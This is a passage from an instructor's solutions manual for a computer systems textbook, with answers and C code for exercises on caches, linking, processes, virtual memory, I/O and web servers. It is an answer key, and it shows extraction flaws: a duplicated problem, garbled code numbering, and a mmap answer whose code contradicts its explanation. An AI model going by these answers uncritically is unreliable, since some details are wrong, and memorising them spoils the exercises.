This is a thought problem to help the students understand the geometry factors that determine the capacity of a disk. Let r be the radius of the platter and xr be the radius of the hole. The number of bits/track is proportional to  $2\pi xr$  (the circumference of the innermost track), and the number of tracks is proportional to (r-xr). Thus, the total number of bits is proportional to  $2\pi xr(r-xr)$ . Setting the derivative to zero and solving for x gives x=1/2. In words, the radius of the hole should be 1/2 the radius of the platter to maximize the bit capacity.

## **Problem 6.21 Solution:**

This problem gives the students more practice in working with address bits. Some students hit a conceptual wall with this idea of partitioning address bit. In our experience, having them do these kinds of simple drills is helpful.

|    | m  | C    | В  | E   | S   | t  | s | b |
|----|----|------|----|-----|-----|----|---|---|
| 1. | 32 | 1024 | 4  | 4   | 64  | 24 | 6 | 2 |
| 2. | 32 | 1024 | 4  | 256 | 1   | 30 | 0 | 2 |
| 3. | 32 | 1024 | 8  | 1   | 128 | 22 | 7 | 3 |
| 4. | 32 | 1024 | 8  | 128 | 1   | 29 | 0 | 3 |
| 5. | 32 | 1024 | 32 | 1   | 32  | 22 | 5 | 5 |
| 6. | 32 | 1024 | 32 | 4   | 8   | 24 | 3 | 5 |

## **Problem 6.22 Solution:**

This is an inverse cache indexing problem (akin to Problem 6.13) that requires the students to work backwards from the contents of the cache to derive a set of addresses that hit in a particular set. Students must know cache indexing cold to solve this style of problem.

A. Set 1 contains two valid lines: Line 0 and Line 1. Line 0 has a tag of 0x45. There are four bytes in each block, and thus four addresses will hit in Line 0. These addresses have the binary form 0 1000 1010 01xx. Thus, the following four hex addresses will hit in Line 0 of Set 1:

 $0 \times 08A4$ ,  $0 \times 08A5$ ,  $0 \times 08A6$ , and  $0 \times 08A7$ .

Similarly, the following four addresses will hit in Line 1 of Set 1:

 $0 \times 0704, 0 \times 0705, 0 \times 0706, 0 \times 0707.$ 

B. Set 6 contains one valid line with a tag of 0x91. Since there is only one valid line in the set, four addresses will hit. These addresses have the binary form 1 0010 0011 10xx. Thus, the four hex addresses that hit in Set 6 are:

61

0x1238, 0x1239, 0x123A, and 0x123B.

# **Problem 6.23 Solution:**

This problem is tougher than it looks. The approach is similar to the solution to Problem 6.14. The cache is not large enough to hold both arrays. References to cache lines for one array evict recently loaded cache lines from the other array.

| dst array                     |   |   |   |   |  |
|-------------------------------|---|---|---|---|--|
| col 0   col 1   col 2   col 3 |   |   |   |   |  |
| row 0                         | m | m | m | m |  |
| row 1                         | m | m | m | m |  |
| row 2                         | m | m | m | m |  |
| row 3                         | m | m | m | m |  |

| src array                     |   |   |   |   |  |
|-------------------------------|---|---|---|---|--|
| col 0   col 1   col 2   col 3 |   |   |   |   |  |
| row 0                         | m | m | h | m |  |
| row 1                         | m | h | m | h |  |
| row 2                         | m | m | h | m |  |
| row 3                         | m | h | m | h |  |

## **Problem 6.24 Solution:**

In this case, the cache is large enough to hold both arrays, so the only misses are the initial cold misses.

| dst array |       |       |       |       |  |
|-----------|-------|-------|-------|-------|--|
|           | col 0 | col 1 | col 2 | col 3 |  |
| row 0     | m     | h     | h     | h     |  |
| row 1     | m     | h     | h     | h     |  |
| row 2     | m     | h     | h     | h     |  |
| row 3     | m     | h     | h     | h     |  |

| src array                     |   |   |   |   |  |
|-------------------------------|---|---|---|---|--|
| col 0   col 1   col 2   col 3 |   |   |   |   |  |
| row 0                         | m | h | h | h |  |
| row 1                         | m | h | h | h |  |
| row 2                         | m | h | h | h |  |
| row 3                         | m | h | h | h |  |

# **Problem 6.25 Solution:**

This style of problem (and the ones that follow) requires a practical high-level analysis of the cache behavior, rather than the more tedious step-by-step analysis that we use when we are first teaching students how caches work. We always include a problem of this type on our exams because it tests a skill the students will need as working programmers: the ability to look at code and get a feel for how well it uses the caches.

In this problem, each cache line holds two 16-byte point\_color structures. The square array is  $256 \times 16 = 4096$  bytes and the cache is 2048 bytes, so the cache can only hold half of the array. Since the code employs a row-wise stride-1 reference pattern, the miss pattern for each cache line is a miss, followed by 7 hits.

- A. What is the total number of writes? 1024 writes.
- B. What is the total number of writes that miss in the cache? 128 misses.
- C. What is the miss rate? 128/1024 = 12.5%.

### **Problem 6.26 Solution:**

Since the cache cannot hold the entire array, the column-wise scan of the second half of the array evicts the lines loaded during the scan of the first half. So for every structure, we have a miss followed by 3 hits.

- A. What is the total number of writes? 1024 writes.
- B. What is the total number of writes that miss in the cache? 256 writes.
- C. What is the miss rate? 256/1024 = 25%.

## **Problem 6.27 Solution:**

Both loops access the array in row-major order. The first loop performs 256 writes. Since each cache line holds two structures, half of these references hit and half miss. The second loop performs a total of 768 writes. For each pair of structures, there is an initial cold miss, followed by 5 hits. So this loop experiences a total of 128 misses. Combined, there are 256 + 768 = 1024 writes, and 128 + 128 = 256 misses.

- A. What is the total number of writes? 1024 writes.
- B. What is the total number of writes that miss in the cache? 256 writes.
- C. What is the miss rate? 256/1024 = 25%.

## **Problem 6.28 Solution:**

Each pixel structure is 4 bytes, so each 4-byte cache line holds exactly one structure. For each structure, there is a miss, followed by three hits, for a miss rate of 25%.

## **Problem 6.29 Solution:**

This code visits the array of pixel structures in row-major order. The cache line holds exactly one structure. Thus, for each structure we have a miss, followed by three hits, for a miss rate of 25%.

#### **Problem 6.30 Solution:**

In this code each loop iteration zeros the entire 4-byte structure by writing a 4-byte integer zero. Thus, although there are only  $640 \times 480$  writes, each of these writes misses. Thus, the miss rate is 100%.

### **Problem 6.30 Solution:**

In this code each loop iteration zeros the entire 4-byte structure by writing a 4-byte integer zero. Thus, although there are only  $640 \times 480$  writes, each of these writes misses. Thus, the miss rate is 100%.

### **Problem 6.31 Solution:**

Solution approach: Use the mountain program to generate a graph similar to Figure 6.43, which shows a slice through the mountain with constant stride and varying working set size. Do the same analysis we did in the text. Each relatively flat region of the graph corresponds to a different level in the hierarchy. As working set size increases, a transition from one flat region to another at size x indicates a cache size of x.

### **Problem 6.32 Solution:**

No solution yet.

### **Problem 6.33 Solution:**

This problem is a lab assignment in the spirit of Problem 6.32. Because there is some computation involved in the inner loop, it provides the students with more opportunities for optimization. See the Instructor's site on the CS:APP Web page for reference solutions.

# 1.7 Chapter 7: Linking

## **Problem 7.6 Solution:**

This problem builds on Problem 7.1 by adding some functions and variables that are declared with the static attribute. The main idea for the students to understand is that static symbols are local to the module that defines them, and are not visible to other modules.

| Symbol | swap.o.symtabentry? | Symbol type | Module where defi ned | Section |
|--------|---------------------|-------------|-----------------------|---------|
| buf    | yes                 | extern      | main.o                | .data   |
| bufp0  | yes                 | global      | swap.o                | .data   |
| bufp1  | yes                 | local       | swap.o                | .bss    |
| swap   | yes                 | global      | swap.o                | .text   |
| temp   | no                  | _           |                       |         |
| incr   | yes                 | local       | swap.o                | .text   |
| count  | yes                 | local       | swap.o                | .data   |

## **Problem 7.7 Solution:**

This is a good example of the kind of silent nasty bugs that can occur because of quirks in the linker's symbol resolution algorithm. The programming error in this case is due to the fact that both modules define a weak global symbol x, which is then resolved silently by the linker (Rule 3). We can fix the bug by simply defining x with the static attribute, which turns it into a local linker symbol, and thus limits its scope to a single module:

```
1 static double x;
2
3 void f() {
4          x = -0.0;
5 }
```

### **Problem 7.8 Solution:**

This is another problem in the spirit of Problem 7.2 that tests the student's understanding of how the linker resolves global symbols, and the kinds of errors that can result if they are not careful.

A. Because Module 2 defines main with the static attribute, it is a local symbol, and thus there are no multiply-defined global symbols. Each module refers to its own definition of main. This is an important idea; make sure students understand the impact of the static attribute and how it limits the scope of function and variable symbols.

```
(a) REF(main.1) --> DEF(main.1)
(b) REF(main.2) --> DEF(main.2)
```

- B. Here we have two weak definitions of x, so the symbol resolution in this case is UNKNOWN (Rule 3).
- C. This is an ERROR, since there are two strong definitions of x (Rule 1).

# **Problem 7.9 Solution:**

This problem is a nice example of why it pays to have a working understanding of linkers. The output of the program is incomprehensible until you realize that linkers are just dumb symbol resolution and relocation machines. Because of Rule 2, the strong symbol associated with the function main in m1.0 overrides the weak symbol associated with the variable main in m2.0. Thus, the reference to variable main in m2 resolves to the value of symbol main, which in this case is the address of the first byte of function main. This byte contains the hex value 0x55, which is the binary encoding of pushl %ebp, the first instruction in procedure main!

### **Problem 7.10 Solution:**

These are more drills, in the spirit of Problem 7.3, that help the students understand how linkers use static libraries when they resolve symbol references.

```
A. gcc p.o libx.aB. gcc p.o libx.a liby.a libx.aC. gcc p.o libx.a liby.a libx.a libz.a
```

### **Problem 7.11 Solution:**

This problem is a sanity check to make sure the students understand the difference between .data and .bss, and why the distinction exists in the first place. The first part of the runtime data segment is initialized with the contents of the .data section in the object file. The last part of the runtime data segment is .bss, which is always initialized to zero, and which doesn't occupy any actual space in the executable file. Thus the discrepancy between the runtime data segment size and the size of the chunk of the object file that initializes it.

#### **Problem 7.12 Solution:**

This problem tests whether the students have grasped the concepts of relocation records and relocation. The solution approach is to mimic the behavior of the linker: use the relocation records to identify the locations

of the references, and then either compute the relocated absolute addresses using the algorithm in Figure 7.9, or simply extract them from the relocated instructions in Figure 7.10. There are a couple of things to notice about the relocatable object file in Figure 7.19:

- The mov1 instruction in line 8 contains two references that need to be relocated.
- The instructions in lines 5 and 8 contain references to buf[1] with an initial value of 0x4. The relocated addresses are computed as ADDR(buf) + 4.

| Line # in Fig.7.10 | Address   | Value     |  |
|--------------------|-----------|-----------|--|
| 15                 | 0x80483cb | 0x004945c |  |
| 16                 | 0x80483d0 | 0x0049458 |  |
| 18                 | 0x80483d8 | 0x0049548 |  |
| 18                 | 0x80483dc | 0x0049458 |  |
| 23                 | 0x80483e7 | 0x0049548 |  |

## **Problem 7.13 Solution:**

The next two problems require the students to derive the relocation records from the C source and the disassembled relocatable. The best solution approach is to learn how to use objdump and then use objdump to extract the relocation records from the executable.

A. Relocation entries for the .text section:

```
1 RELOCATION RECORDS FOR [.text]:
2 OFFSET TYPE VALUE
3 00000012 R_386_PC32 p3
4 00000019 R_386_32 xp
5 00000021 R_386_PC32 p2
```

B. Relocation entries for .data section:

```
1 RELOCATION RECORDS FOR [.data]:
2 OFFSET TYPE VALUE
3 00000004 R_386_32 x
```

### **Problem 7.14 Solution:**

A. Relocation entries for the .text section:

B. Relocation entries for the . rodata section:

```
1 RELOCATION RECORDS FOR [.rodata]:
2 OFFSET TYPE VALUE
3 00000000 R_386_32 .text
4 00000004 R_386_32 .text
5 00000008 R_386_32 .text
6 0000000c R_386_32 .text
7 00000010 R_386_32 .text
8 00000014 R_386_32 .text
```

### **Problem 7.15 Solution:**

A. On our system, libc.a has 1082 members and libm.a has 373 members.

```
unix> ar -t /usr/lib/libc.a | wc -l

1082

unix> ar -t /usr/lib/libm.a | wc -l

373
```

- B. Interestingly, the code in the .text section is identical, whether a program is compiled using -g or not. The difference is that the "-O2 -g" object file contains debugging info in the .debug section, while the "-O2" version does not.
- C. On our system, the gcc driver uses the standard C library (libc.so.6) and the dynamic linker (ld-linux.so.2):

```
linux> ldd /usr/local/bin/gcc
    libc.so.6 => /lib/libc.so.6 (0x4001a000)
    /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
```

# 1.8 Chapter 8: Exceptional Control Flow

### **Problem 8.8 Solution:**

- A. Called once, returns twice: fork
- B. Called once, never returns: execve and longjmp.
- C. Called once, returns one or more times: setjmp.

# **Problem 8.9 Solution:**

This problem is a simple variant of Problem 8.1. The parent process prints

```
x=4
x=3
```

and the child process prints

x=2

Thus, any of the following sequences represents a possible output:

```
x=4 x=4 x=2
x=3 x=2 x=4
x=2 x=3 x=3
```

#### **Problem 8.10 Solution:**

The program consists of three processes: the original parent, its child, and its grandchild. Each of these processes executes a single printf and then terminates. Thus, the program prints three "hello" lines.

## **Problem 8.11 Solution:**

This program is identical to the program in Problem 8.10, except that the call to exit in line 8 has been replaced by a return statement. The process hierarchy is identical, consisting of a parent, a child, and a grandchild. And as before, the parent executes a single printf. However, because of the return statement, the child and grandchild each execute two printf statements. Thus, the program prints a total of five output lines.

### **Problem 8.12 Solution:**

The parent initializes counter to 1, then creates the child, which decrements counter and terminates. The parent waits for the child to terminate, then increments counter and prints the result. Remember, each process has its own separate address space, so the decrement by the child has no impact on the parent's copy of counter. Thus the output is:

```
counter = 2
```

### **Problem 8.13 Solution:**

This problem is a nice way to check the students' understanding of the interleaved execution of processes. It also their first introduction to the idea of synchronization. In this case, the wait function in the parent will not complete until the child has terminated. The key idea is that any topological sort of the following DAG is a possible output:



Thus, there are only three possible outcomes (each column is an outcome):

| Hello | Hello | Hello |
|-------|-------|-------|
| 1     | 1     | 0     |
| Bye   | 0     | 1     |
| 0     | Bye   | Bye   |
| 2     | 2     | 2     |
| Bye   | Bye   | Bye   |

## **Problem 8.14 Solution:**

This problem really tests the students' understanding of concurrent process execution. The most systematic solution approach is to draw the process hierarchy, labeling each node with the output of the corresponding process:

"1" 
$$a$$
 "12"  $b$  2  $c$  "02'  $c$   $d$  "0"

For each process, the kernel preserves the ordering of its printf statements, but otherwise can interleave the statements arbitrarily. Thus, any topological sort of the following DAG represents a possible output:

$$1 \quad 1 \rightarrow 2 \quad 0 \rightarrow 2 \quad 0$$

- A. 112002 (possible)
- B. 211020 (not possible)
- C. 102120 (possible)
- D. 122001 (not possible)
- E. 100212 (possible)

## **Problem 8.15 Solution:**

This is an easy problem for students who understand the execve function and the structure of the argv and envp arrays. Notice that a correct solution must pass a pointer to the envp array (the global environ pointer on our system) to correctly mimic the behavior of /bin/ls.

\_\_\_\_ code/ecf/myls-ans.c

```
1 #include "csapp.h"
2
3 int main(int argc, char **argv) {
4   Execve("/bin/ls", argv, environ);
5   exit(0);
6 }
```

\_\_\_\_\_code/ecf/myls-ans.c

### **Problem 8.16 Solution:**

This is a nontrivial problem that teaches the students how a parent process can use the wait function to determine a child's termination status.

\_\_\_\_\_ code/ecf/waitprob2-ans.c

```
1 #include "csapp.h"
3 #define NCHILDREN 2
5 int main()
6 {
      int status, i;
      pid_t pid;
8
      char buf[MAXLINE];
9
10
      for (i = 0; i < NCHILDREN; i++) {
11
           pid = Fork();
12
13
           if (pid == 0)
                          /* child */
               /* child attempts to modify first byte of main */
14
15
               *(char *)main = 1;
      }
16
17
       /* parent waits for all children to terminate */
18
      while ((pid = wait(&status)) > 0) {
19
           if (WIFEXITED(status))
20
               printf("child %d terminated normally with exit status=%d\n",
21
                      pid, WEXITSTATUS(status));
22
           else
23
               if (WIFSIGNALED(status)) {
24
                   sprintf(buf, "child %d terminated by signal %d",
25
                            pid, WTERMSIG(status));
                   psignal(WTERMSIG(status), buf);
2.7
28
29
      if (errno != ECHILD)
30
           unix_error("wait error");
31
32
      return 0;
33
34 }
```

\_\_\_\_\_code/ecf/waitprob2-ans.c

### **Problem 8.17 Solution:**

The system man page provides a basic template for implementing the mysystem function. The version the students implement for this problem requires somewhat different return code processing.

\_\_\_\_\_ code/ecf/mysystem-ans.c

```
1 #include "csapp.h"
3 int mysystem(char *command)
4 {
       pid_t pid;
5
       int status;
6
7
       if (command == NULL)
8
9
           return -1;
10
       if ((pid = fork()) == -1)
11
           return -1;
12
13
       if (pid == 0) { /* child */
14
15
           char *argv[4];
           argv[0] = "sh";
16
           argv[1] = "-c";
17
           argv[2] = command;
18
           argv[3] = NULL;
19
           execve("/bin/sh", argv, environ);
20
           exit(-1); /* control should never reach here */
21
       }
22
23
       /* parent */
24
       while (1) {
25
           if (waitpid(pid, &status, 0) == -1) {
26
               if (errno != EINTR) /* restart waitpid if interrupted */
27
                    return -1;
28
           }
29
           else {
30
31
               if (WIFEXITED(status))
                    return WEXITSTATUS(status);
32
               else
33
34
                   return status;
           }
35
36
37 }
```

\_\_\_ code/ecf/mysystem-ans.c

# **Problem 8.19 Solution:**

This is a nice problem that shows students the interaction between two different forms of exceptional control flow: signals and nonlocal jumps.

## **Problem 8.18 Solution:**

Signals cannot be used to count events in other processes because signals are not queued. Solving this problem requires inter-process communication (IPC) mechanisms (not discussed in the text), or threads, which are discussed in Chapter 13.

\_ code/ecf/tfgets-ans.c

```
1 #include "csapp.h"
3 static sigjmp_buf env;
5 static void handler(int sig)
      Alarm(0);
7
       siglongjmp(env, 1);
9 }
10
11 char *tfgets(char *s, int size, FILE *stream)
12 {
       Signal(SIGALRM, handler);
13
14
15
      Alarm(5);
16
      if (sigsetjmp(env, 1) == 0)
          return(Fgets(s, size, stream)); /* return user input */
17
       else
18
          return NULL; /* return NULL if fgets times out */
19
20 }
21
22 int main()
23 {
      char buf[MAXLINE];
24
25
26
     while (1) {
27
          bzero(buf, MAXLINE);
           if (tfgets(buf, sizeof(buf), stdin) != NULL)
28
29
              printf("read: %s", buf);
          else
30
              printf("timed out\n");
31
32
33
       exit(0);
34 }
```

\_\_\_\_\_code/ecf/tfgets-ans.c

#### **Problem 8.20 Solution:**

Writing a simple shell with job control is a fascinating project that ties together many of the ideas in this chapter. The distribution of the Shell Lab on the CS:APP Instructor Site

```
http://csapp.cs.cmu.edu/public/instructors.html
```

provides the reference solution.

# 1.9 Chapter 9: Measuring Program Execution Time

# **Problem 9.9 Solution:**

This problem requires careful study of the trace and a certain amount of educating guessing.

- A. A timer interrupt causes the current process to become inactive. Periods I0, I2, I4, I5, I6, I8, and I9. occur exactly 9.95ms apart.
- B. I5 (247,113 cycles) is the shortest period caused by a timer interrupt.
- C. The true clock rate (in MHz) is  $549.9 \times 9.95/10.0 = 547.2$ .

## **Problem 9.10 Solution:**

This problem gets students started using the library functions for time measurement. It is interesting to see such a program in action. Running under both LINUX and SOLARIS, we measured 100 ticks per second. Running under WINDOWS-NT, we measured 1000 ticks per second.

\_ code/perf/tps-ans.c

```
1 #include <stdlib.h>
2 #include <stdio.h>
4 #include <unistd.h>
5 #include <sys/times.h>
7 int tps()
8 {
       clock t tstart;
9
10
       struct tms t;
11
12
      tstart = times(&t);
       sleep(1);
13
14
       return (int) (times(&t) - tstart);
15 }
16
17
18 int main(int argc, char *argv[])
```

```
19 {
20          printf("%d ticks/second\n", tps());
21          return 0;
22 }
```

\_\_\_\_\_code/perf/tps-ans.c

#### **Problem 9.11 Solution:**

This is the basic tool we used for generating activity traces. Running it for different values of the threshold and on systems with different loads produces interesting results.

\_\_\_ code/perf/inactive-ans.c

```
1 #include <stdio.h>
2 #include <stdlib.h>
3 #include "clock.h"
5 int inactive_duration(int thresh);
7 int main (int argc, char *argv[])
8 {
9
      int i;
10
      for (i = 0; i < 5; i++) {
11
           int d = inactive_duration(1000);
12
           printf("%d cycles\n", d);
13
14
15
      return 0;
16 }
17
18 int inactive_duration(int thresh)
19 {
20
      double oldt, newt;
      int delta;
21
      start_counter();
22
      newt = get_counter();
23
24
25
      do {
           oldt = newt;
26
           newt = get_counter();
27
28
           delta = (int) (newt - oldt);
       } while (delta < thresh);</pre>
29
      return delta;
30
31 }
32
```

\_\_\_ code/perf/inactive-ans.c

This problem requires thinking about the granularity of interval timers and the possible inaccuracies this can give.

- A. If the call to sleep occurs right after a timer interrupt, then the process will be inactive for almost exactly 2 seconds. If it occurs just before a timer interrupt, then it will be inactive for just 1.99 seconds, giving  $1.99 \le w \le 2.00$ .
- B. We completed  $2 \times 10^9$  cycles in time w. This implies a clock rate betwen 1000 and 1005 MHz.

# 1.10 Chapter 10: Virtual Memory

## **Problem 10.11 Solution:**

The following series of address translation problems give the students more practice with translation process. These kinds of problems make excellent exam questions because they require deep understanding, and they can be endlessly recycled in slightly different forms.

```
A. 00 0010 0111 1100
```

C. 0101 1111 1100

#### **Problem 10.12 Solution:**

A. 00 0011 1010 1001

B. VPN: 0xe
TLBI: 0x2
TLBT: 0x3
TLB hit? N

```
page fault?
                        Ν
       PPN:
                         0x11
C.
       0100 0110 1001
       co:
                         0x1
D.
       CI:
                         0xa
       CT:
                         0x11
       cache hit?
                        Ν
       cache byte?
```

#### **Problem 10.13 Solution:**

```
A. 00 0000 0100 0000
```

| В. | VPN:        | 0x1 |
|----|-------------|-----|
|    | TLBI:       | 0x1 |
|    | TLBT:       | 0x0 |
|    | TLB hit?    | N   |
|    | page fault? | Y   |
|    | PPN:        | _   |
|    |             |     |
| C  | n/a         |     |

- С. n/a
- D. n/a

# **Problem 10.14 Solution:**

This problem has a kind of "gee whiz!" appeal to students when they realize that they can modify a disk file by writing to a memory location. The template is given in the solution to Problem 10.5. The only tricky part is to realize that changes to memory-mapped objects are not reflected back unless they are mapped with the MAP\_SHARED option.

\_\_ code/vm/mmapwrite-ans.c

```
1 #include "csapp.h"
3 /*
   * mmapwrite - uses mmap to modify a disk file
6 void mmapwrite(int fd, int len)
7 {
      char *bufp;
8
            bufp = Mmap(NULL, len, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);*/
10
```

```
bufp = Mmap(NULL, len, PROT_READ|PROT_WRITE, MAP_PRIVATE, fd, 0);
11
12
       bufp[0] = 'J';
13 }
14
15 /* mmapwrite driver */
16 int main(int argc, char **argv)
17 {
       int fd;
18
19
       struct stat stat;
20
       /* check for required command line argument */
21
       if (argc != 2) {
22
           printf("usage: %s <filename>\n", argv[0]);
23
24
           exit(0);
25
       }
26
       /* open the input file and get its size */
27
       fd = Open(argv[1], O_RDWR, 0);
28
       fstat(fd, &stat);
29
       mmapwrite(fd, stat.st_size);
30
31
       exit(0);
32 }
```

\_\_\_\_\_ code/vm/mmapwrite-ans.c

# **Problem 10.15 Solution:**

This is another variant of Problem 10.6.

| Request    | Block size (decimal bytes) | Block header (hex) |
|------------|----------------------------|--------------------|
| malloc(3)  | 8                          | 0x9                |
| malloc(11) | 16                         | 0x11               |
| malloc(20) | 24                         | 0x19               |
| malloc(21) | 32                         | 0x21               |

## **Problem 10.16 Solution:**

This is a variant of Problem 10.7. The students might find it interesting that optimized boundary tags coalescing scheme, where the allocated blocks don't need a footer, has the same minimum block size (16 bytes) for either alignment requirement.

| Alignment   | Allocated block       | Free block        | Minimum block size (bytes) |
|-------------|-----------------------|-------------------|----------------------------|
| Single-word | Header and footer     | Header and footer | 20                         |
| Single-word | Header, but no footer | Header and footer | 16                         |
| Double-word | Header and footer     | Header and footer | 24                         |
| Double-word | Header, but no footer | Header and footer | 16                         |

# **Problem 10.17 Solution:**

This is a really interesting problem for students to work out. At first glance, the solution appears trivial. You define a global roving pointer (void \*rover) that points initially to the front of the list, and then perform the search using this rover:

\_\_\_\_\_ code/vm/malloc2-ans.c

```
1 static void *find_fit(size_t asize)
2 {
3
       char *oldrover;
4
       oldrover = rover;
6
       /* search from the rover to the end of list */
       for ( ; GET_SIZE(HDRP(rover)) > 0; rover = NEXT_BLKP(rover))
8
           if (!GET ALLOC(HDRP(rover)) && (asize <= GET SIZE(HDRP(rover))))</pre>
9
               return rover;
10
11
       /* search from start of list to old rover */
12
       for (rover = heap_listp; rover < oldrover; rover = NEXT_BLKP(rover))</pre>
13
           if (!GET_ALLOC(HDRP(rover)) && (asize <= GET_SIZE(HDRP(rover))))</pre>
14
15
               return rover;
16
17
       return NULL; /* no fit found */
18 }
```

\_\_\_\_ code/vm/malloc2-ans.c

However, the interaction with coalescing introduces a subtlety that is easy to overlook. Suppose that the rover is pointing at an allocated block b when the application makes a request to free b. If the previous block is free, then it will be coalesced with b, and the rover now points to garbage in the middle of a free block. Eventually, the allocator will either allocate a non-disjoint block or crash. Thus, a correct solution must anticipate this situation when it coalesces, and adjust the rover to point to new coalesced block:

\_\_\_\_ code/vm/malloc2-ans.c

```
1 static void *coalesce(void *bp)
2 {
      int prev_alloc = GET_ALLOC(FTRP(PREV_BLKP(bp)));
3
      int next alloc = GET ALLOC(HDRP(NEXT BLKP(bp)));
4
5
      size_t size = GET_SIZE(HDRP(bp));
6
      if (prev_alloc && next_alloc) {
                                                   /* Case 1 */
7
           return bp;
8
9
10
11
      else if (prev_alloc && !next_alloc) {
                                                   /* Case 2 */
           size += GET_SIZE(HDRP(NEXT_BLKP(bp)));
12
           PUT(HDRP(bp), PACK(size, 0));
13
           PUT(FTRP(bp), PACK(size,0));
14
      }
15
16
```

```
else if (!prev_alloc && next_alloc) {
                                                     /* Case 3 */
17
           size += GET SIZE(HDRP(PREV BLKP(bp)));
18
           PUT(FTRP(bp), PACK(size, 0));
19
20
           PUT(HDRP(PREV_BLKP(bp)), PACK(size, 0));
           bp = PREV_BLKP(bp);
21
22
23
       else {
                                                     /* Case 4 */
24
25
           size += GET_SIZE(HDRP(PREV_BLKP(bp))) +
               GET SIZE(FTRP(NEXT BLKP(bp)));
26
           PUT(HDRP(PREV_BLKP(bp)), PACK(size, 0));
27
           PUT(FTRP(NEXT_BLKP(bp)), PACK(size, 0));
2.8
           bp = PREV_BLKP(bp);
29
       }
30
31
       /* Make sure the rover isn't pointing into the free block */
32
       /* that we just coalesced */
33
       if ((rover > (char *)bp) && (rover < NEXT_BLKP(bp)))</pre>
34
           rover = bp;
35
36
       return bp;
37
38 }
```

\_\_\_\_\_code/vm/malloc2-ans.c

Interestingly, when we benchmark the implicit allocator in Section 10.9.12 on a collection of large traces, we find that next fit improves the average throughput by more than a factor of 10, from 10K requests/sec to a respectable 139K requests/sec. However, the memory utilization of next fit (80%) is worse than first fit (99%). By contrast, the C standard library's GNU malloc package, which uses a complicated segregated storage scheme, runs at 119K requests/sec on the same set of traces.

## **Problem 10.18 Solution:**

No solution yet.

# **Problem 10.19 Solution:**

Here are the true statements. The observation about the equivalence of first fit and best fit when the list is ordered is interesting.

- 1. (a) In a buddy system, up to 50% of the space can be wasted due to internal fragmentation.
- 2. (d) Using the first-fit algorithm on a free list that is ordered according to increasing block sizes is equivalent to using the best-fit algorithm.
- 3. (b) Mark-and-sweep garbage collectors are called conservative if they treat everything that looks like a pointer as a pointer,

#### **Problem 10.20 Solution:**

1.11. CHAPTER 11: I/O 79

This one of our favorite labs. See the CS:APP Instructor's Web page for a turnkey solution, including solution implementation and autograders.

# 1.11 Chapter 11: I/O

#### **Problem 11.6 Solution:**

On entry, descriptors 0-2 are already open. The open function always returns the lowest possible descriptor, so the first two calls to open return descriptors 3 and 4. The call to the close function frees up descriptor 4, so the final call to open returns descriptor 4, and thus the output of the program is "fd2 = 4".

#### **Problem 11.7 Solution:**

\_\_\_\_ code/io/cpfile1-ans.c

```
1 #include "csapp.h"
2
3 int main(int argc, char **argv)
4 {
5    int n;
6    char buf[MAXBUF];
7
8    while((n = Rio_readn(STDIN_FILENO, buf, MAXBUF))) != 0)
9        Rio_writen(STDOUT_FILENO, buf, n);
10    exit(0);
11 }
```

\_\_\_\_ code/io/cpfile1-ans.c

#### **Problem 11.8 Solution:**

The solution is nearly identical to Figure 11.10, calling fstat instead of stat.

\_\_\_\_\_ code/io/fstatcheck-ans.c

```
1 #include "csapp.h"
3 int main (int argc, char **argv)
4 {
      struct stat stat;
      char *type, *readok;
6
      int size;
7
8
      if (argc != 2) {
9
           fprintf(stderr, "usage: %s <fd>\n", argv[0]);
10
           exit(0);
11
12
      Fstat(atoi(argv[1]), &stat);
13
```

```
/* Determine file type */
14
       if (S_ISREG(stat.st_mode))
           type = "regular";
15
       else if (S_ISDIR(stat.st_mode))
16
17
           type = "directory";
       else if (S_ISCHR(stat.st_mode))
18
           type = "character device";
19
       else
20
           type = "other";
21
22
       if ((stat.st_mode & S_IRUSR)) /* Check read access */
23
           readok = "yes";
24
25
       else
           readok = "no";
26
27
28
       size = stat.st_size; /* check size */
29
       printf("type: %s, read: %s, size=%d\n",
30
              type, readok, size);
31
32
       exit(0);
33
34 }
```

\_\_ code/io/fstatcheck-ans.c

# **Problem 11.9 Solution:**

Before the call to execve, the child process opens foo.txt as descriptor 3, redirects stdin to foo.txt, and then (here is the kicker) closes descriptor 3:

```
if (Fork() == 0) { /* child */
    fd = Open(''foo.txt'', O_RDONLY, 0); /* fd == 3 */
    Dup2(fd, STDIN_FILENO);
    Close(fd);
    Execve(''fstatcheck'', argv, envp);
}
```

When fstatcheck begins running in the child, there are exactly three open files, corresponding to descriptors 0, 1, and 2, with descriptor 1 redirected to foo.txt.

# **Problem 11.10 Solution:**

The purpose of this problem is to give the students additional practice with I/O redirection. The trick is that if the user asks us to copy a file, we redirect standard input to that file before running the copy loop. The redirection allows the same copy loop to be used for either case.

\_\_\_\_\_ code/io/cpfile2-ans.c

```
1 #include "csapp.h"
2
3 int main(int argc, char **argv)
4 {
```

```
5
       int n;
       rio t rio;
6
       char buf[MAXLINE];
       if ((argc != 1) && (argc != 2) ) {
9
           fprintf(stderr, "usage: %s <infile>\n", argv[0]);
10
           exit(1);
11
       }
12
13
       if (argc == 2) {
14
           int fd;
15
           if ((fd = Open(argv[1], O_RDONLY, 0)) < 0) {</pre>
16
               fprintf(stderr, "Couldn't read %s\n", argv[1]);
17
               exit(1);
18
19
           }
           Dup2(fd, STDIN FILENO);
2.0
           Close(fd);
21
       }
22
23
       Rio_readinitb(&rio, STDIN_FILENO);
24
       while((n = Rio_readlineb(&rio, buf, MAXLINE)) != 0)
25
           Rio_writen(STDOUT_FILENO, buf, n);
26
       exit(0);
27
28 }
```

code/io/cpfile2-ans.c

# 1.12 Chapter 12: Network Programming

#### **Problem 12.6 Solution:**

There is no unique solution. The problem has several purposes. First, we want to make sure students can compile and run Tiny. Second, we want students to see what a real browser request looks like and what the information contained in it means.

#### **Problem 12.7 Solution:**

Solution outline: This sounds like it might be difficult, but it is really very simple. To a Web server, all content is just a stream of bytes. Simply add the MIME type video/mpg to the get\_filetype function in Figure 12.33.

## **Problem 12.8 Solution:**

Solution outline: Install a SIGCHLD handler in the main routine and delete the call to wait in serve dynamic.

# **Problem 12.9 Solution:**

Solution outline: Allocate a buffer, read the requested file into the buffer, write the buffer to the descriptor, and then free the buffer.

#### **Problem 12.10 Solution:**

No solution yet.

# **Problem 12.11 Solution:**

Solution outline: HEAD is identical to GET, except that it does not return the response body.

#### **Problem 12.12 Solution:**

No solution yet.

#### **Problem 12.13 Solution:**

